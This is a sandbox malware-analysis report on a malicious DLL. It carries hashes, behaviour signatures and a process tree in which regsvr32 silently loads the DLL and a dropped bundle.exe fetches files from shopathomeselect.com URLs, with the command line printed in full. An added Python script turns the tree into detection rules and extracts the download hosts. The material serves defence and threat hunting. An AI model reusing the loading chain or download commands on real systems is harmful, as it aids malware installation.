Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    117s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    19/03/2024, 08:39

General

  • Target

    d5ae71e6109ad99590a2b3ec2d2f55d7.dll

  • Size

    96KB

  • MD5

    d5ae71e6109ad99590a2b3ec2d2f55d7

  • SHA1

    5e1088bdcd5eca984f6546296aaae41b6180b66d

  • SHA256

    bb14e2647c19bc26b2cbaa537795aaa9cb0c3959cadfc6c78564d3603714cb86

  • SHA512

    394f03eb0ffd879d8d8fa56825b934e67e103d756ce0f71f08f7c9bd464a20e2dbc3681c9b050b229620245f3b4510fc2aeea6c31c958f282a5ebf04c362c5dc

  • SSDEEP

    1536:IflEc8naP2D22/muSD6d68BrJOx2LednhYxN0CcjwwDvx:I5g22/dBrJOMLkOf+N7x

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 9 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Modifies registry class 10 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\system32\regsvr32.exe
    regsvr32 /s C:\Users\Admin\AppData\Local\Temp\d5ae71e6109ad99590a2b3ec2d2f55d7.dll
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1752
    • C:\Windows\SysWOW64\regsvr32.exe
      /s C:\Users\Admin\AppData\Local\Temp\d5ae71e6109ad99590a2b3ec2d2f55d7.dll
      2⤵
      • Loads dropped DLL
      • Drops file in System32 directory
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:2344
      • C:\Windows\SysWOW64\sahagent1003.exe
        "C:\Windows\System32\sahagent1003.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1524
        • C:\Users\Admin\AppData\Local\Temp\bundle.exe
          "C:\Users\Admin\AppData\Local\Temp\bundle.exe" download1.shopathomeselect.com/agent/mindset1003.sah#bunSetup.cab#download1.shopathomeselect.com/agent/bunSetup.cab#www.shopathomeselect.com/agent/agentprefs.sah
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          PID:2816
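
The chain above (regsvr32 /s on a DLL in the user's Temp directory, the 64-bit regsvr32 re-launching its SysWOW64 copy for the 32-bit DLL, that regsvr32 starting sahagent1003.exe, which runs bundle.exe with a '#'-separated list of download targets) is what a detection engineer turns into rules. The script below is an added example and is not part of the tria.ge report: it reconstructs the tree as process-creation events (the pid/ppid/image/command_line field names are an assumption modelled on Sysmon Event ID 1; the parent of PID 1752 is not shown in the report and is set to 0), applies three checks, and extracts the download hosts. One caveat it makes explicit: the "Drops file in System32 directory" signature and the command line "C:\Windows\System32\sahagent1003.exe" belong to a 32-bit process under WOW64, so the file actually lands in C:\Windows\SysWOW64, which is where the report lists the image; a rule keyed only on the literal System32 path would miss it.

```python
"""Turn a sandbox process tree into detections and network IOCs.

Added example, not part of the tria.ge report. The events are constructed
from the report's Processes section; the field names (pid, ppid, image,
command_line) are an assumption modelled on Sysmon Event ID 1.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str          # path of the executable that actually ran
    command_line: str   # command line as supplied by the parent


# Constructed from the report's process tree. The parent of PID 1752 is not
# shown in the report, so its ppid is set to 0 (assumption).
EVENTS: List[ProcEvent] = [
    ProcEvent(1752, 0, r"C:\Windows\system32\regsvr32.exe",
              r"regsvr32 /s C:\Users\Admin\AppData\Local\Temp\d5ae71e6109ad99590a2b3ec2d2f55d7.dll"),
    ProcEvent(2344, 1752, r"C:\Windows\SysWOW64\regsvr32.exe",
              r"/s C:\Users\Admin\AppData\Local\Temp\d5ae71e6109ad99590a2b3ec2d2f55d7.dll"),
    ProcEvent(1524, 2344, r"C:\Windows\SysWOW64\sahagent1003.exe",
              r'"C:\Windows\System32\sahagent1003.exe"'),
    ProcEvent(2816, 1524, r"C:\Users\Admin\AppData\Local\Temp\bundle.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\bundle.exe" '
              r"download1.shopathomeselect.com/agent/mindset1003.sah#bunSetup.cab#"
              r"download1.shopathomeselect.com/agent/bunSetup.cab#"
              r"www.shopathomeselect.com/agent/agentprefs.sah"),
]

_FIRST_TOKEN = re.compile(r'^(?:"([^"]+)"|(\S+))\s*(.*)$', re.S)
_URL_TOKEN = re.compile(r"^(?:https?://)?([A-Za-z0-9.-]+\.[A-Za-z]{2,})(/\S*)?$")


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def split_cmdline(cmd: str) -> Tuple[str, str]:
    """Return (first token without quotes, remaining arguments)."""
    m = _FIRST_TOKEN.match(cmd)
    return (m.group(1) or m.group(2)), m.group(3)


def regsvr32_silent_user_dll(ev: ProcEvent) -> bool:
    """regsvr32 /s registering a DLL from the user's Temp directory.
    Fires on both hops in the report (64-bit regsvr32 and its SysWOW64 re-launch)."""
    if basename(ev.image) != "regsvr32.exe":
        return False
    args = ev.command_line.lower().split()
    return "/s" in args and any(
        "\\appdata\\local\\temp\\" in a and a.endswith(".dll") for a in args)


def regsvr32_spawns_foreign_child(events: List[ProcEvent]) -> List[Tuple[int, int, str]]:
    """DllRegisterServer has no business starting a new executable.
    Returns (parent pid, child pid, child image) for every non-regsvr32 child of regsvr32."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent and basename(parent.image) == "regsvr32.exe" \
                and basename(e.image) != "regsvr32.exe":
            hits.append((parent.pid, e.pid, basename(e.image)))
    return hits


def wow64_redirected(ev: ProcEvent) -> bool:
    """Command line names C:\\Windows\\System32 but the image ran from SysWOW64.
    WOW64 redirects a 32-bit process's System32 writes to SysWOW64, so rules
    keyed on the literal System32 path never see the dropped file."""
    claimed, _ = split_cmdline(ev.command_line)
    return (claimed.lower().startswith("c:\\windows\\system32\\")
            and ev.image.lower().startswith("c:\\windows\\syswow64\\"))


def download_targets(ev: ProcEvent) -> List[Tuple[str, str]]:
    """Split a '#'-separated argument list into (host, path) pairs.
    Tokens without a path (here 'bunSetup.cab') are local names and are dropped."""
    _, args = split_cmdline(ev.command_line)
    targets = []
    for tok in args.split("#"):
        m = _URL_TOKEN.match(tok.strip())
        if m and m.group(2):
            targets.append((m.group(1).lower(), m.group(2)))
    return targets


def triage(events: List[ProcEvent]) -> Dict[str, object]:
    """Run every check over the tree and collect the network IOCs."""
    hosts = sorted({h for e in events for h, _ in download_targets(e)})
    return {
        "regsvr32_silent_user_dll": [e.pid for e in events if regsvr32_silent_user_dll(e)],
        "regsvr32_spawns_foreign_child": regsvr32_spawns_foreign_child(events),
        "wow64_redirected": [e.pid for e in events if wow64_redirected(e)],
        "download_hosts": hosts,
    }


if __name__ == "__main__":
    for name, value in triage(EVENTS).items():
        print(f"{name}: {value}")
```

Run against the report's tree, the checks flag PIDs 1752 and 2344 for the silent Temp-DLL registration, PID 2344 spawning sahagent1003.exe, PID 1524 as the WOW64-redirected drop, and yield the two shopathomeselect.com hosts for blocking or retro-hunting in proxy logs.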

Network

MITRE ATT&CK Enterprise v15

Downloads

  • \Users\Admin\AppData\Local\Temp\bundle.exe

    Filesize

    76KB

    MD5

    12b77b012ec72a0dfdc311b0f46de641

    SHA1

    52efa989341f778626da592915048a280c1a305f

    SHA256

    ab995fdb0470311ffb79b1163e78ad4506fe89881c3fc92994bfc99b2e2351fa

    SHA512

    9f2cf0e249e1f35aea96e23e5c5f66ef83b321f0519fa0d6a5e73e25ca6977bd4ae3fd9baceba3237b602335a422b96af6e00cabf17a7ba0f7f50dd99b782a1a

  • \Windows\SysWOW64\sahagent1003.exe

    Filesize

    72KB

    MD5

    82344899bc34ce448a909f5bb7c56e5c

    SHA1

    52ec80cdd38415c5d67afee75c46ef3523fb4ceb

    SHA256

    e12d3e05d4c5f68b1a116c60e6f4c1b3235fdb1a7171e44c05847ccfe3972c44

    SHA512

    ef5be92a5e85951bb5a64f471d1c9fee1fb644a1716ab147356dd811e284f3567c7e0a7457de1290d0b9ad5ea594ca4c9d670abed4dd2e3e599bc4c5cd069e8b